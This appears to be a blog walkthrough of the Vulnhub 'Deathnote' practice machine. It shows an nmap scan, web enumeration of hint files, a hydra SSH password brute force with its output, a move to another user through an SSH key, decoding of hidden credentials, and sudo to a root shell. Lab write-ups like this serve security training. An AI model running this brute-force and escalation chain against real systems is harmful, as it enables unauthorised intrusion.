728x90
반응형
Description
Level - easy
don't waste too much time thinking outside the box . It is a Straight forward box .
This works better with VirtualBox rather than VMware
Scan open Port
$ sudo nmap -sC -sV 192.168.0.10
Domain Name Resolve
$ curl 192.168.0.10
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="refresh" content="1; url='http://deathnote.vuln/wordpress" />
</head>
<body>
<cente> <p>Please wait.....</p></center>
</body>
</html>
$ vim /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
192.168.0.10 deathnote.vuln # append
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Enumerate Web
$ curl http://deathnote.vuln/robots.txt
fuck it my dad
added hint on /important.jpg
ryuk please delete it
$ curl http://deathnote.vuln/important.jpg
i am Soichiro Yagami, light's father
i have a doubt if L is true about the assumption that light is kira
i can only help you by giving something important
login username : user.txt
i don't know the password.
find it by yourself
but i think it is in the hint section of site
# Recon
http://deathnote.vuln/wordpress/index.php/hint/
# Guess Username list
- kila
- l
# Guess Password list
- iamjustic3
Wordpress Admin Page
# Credential
- l
- iamjustic3
$ curl http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt
death4
death4life
death4u
...
death4me
Brute Force Login
$ hydra -l l -P notes.txt 192.168.0.10 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-26 06:28:40
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 43 login tries (l:1/p:43), ~3 tries per task
[DATA] attacking ssh://192.168.0.10:22/
[22][ssh] host: 192.168.0.10 login: l password: death4me
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-09-26 06:28:48
User Esaclate
l@deathnote:/home/kira/.ssh$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDyiW87OWKrV0KW13eKWJir58hT8IbC6Z61SZNh4Yzm9XlfTcCytDH56uhDOqtMR6jVzs9qCSXGQFLhc6IMPF69YMiK9yTU5ahT8LmfO0ObqSfSAGHaS0i5A73pxlqUTHHrzhB3/Jy93n0NfPqOX7HGkLBasYR0v/IreR74iiBI0JseDxyrZCLcl6h9V0WiU0mjbPNBGOffz41CJN78y2YXBuUliOAj/6vBi+wMyFF3jQhP4Su72ssLH1n/E2HBimD0F75mi6LE9SNuI6NivbJUWZFrfbQhN2FSsIHnuoLIJQfuFZsQtJsBQ9d3yvTD2k/POyhURC6MW0V/aQICFZ6z l@deathnote
l@deathnote:/home/kira/.ssh$ ssh kira@192.168.0.10
Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep 25 14:56:16 2021 from 192.168.0.10
kira@deathnote:~$
Root Escalate
kira@deathnote:~$ echo "cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp" |base64 -d
please protect one of the following
1. L (/opt)
2. Misa (/var)
kira@deathnote:/opt/L/fake-notebook-rule$ cat case.wav
63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d
# Cyber Chef : FromHex decode
cGFzc3dkIDoga2lyYWlzZXZpbCA=
# Shell
kira@deathnote:/opt/L/fake-notebook-rule$ echo "cGFzc3dkIDoga2lyYWlzZXZpbCA=" |base64 -d
passwd : kiraisevil
kira@deathnote:/opt/L/fake-notebook-rule$ sudo -l
[sudo] password for kira:
Matching Defaults entries for kira on deathnote:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User kira may run the following commands on deathnote:
(ALL : ALL) ALL
kira@deathnote:/opt/L/fake-notebook-rule$ sudo /bin/bash
root@deathnote:/opt/L/fake-notebook-rule#
728x90
반응형
'Pentest > Vulnhub' 카테고리의 다른 글
[Vulnhub] Kioptrix Level 1 (0) | 2021.09.25 |
---|---|
[Vulnhub] Money Box (0) | 2021.03.07 |
[Vulnhub] : y0usef (0) | 2021.03.01 |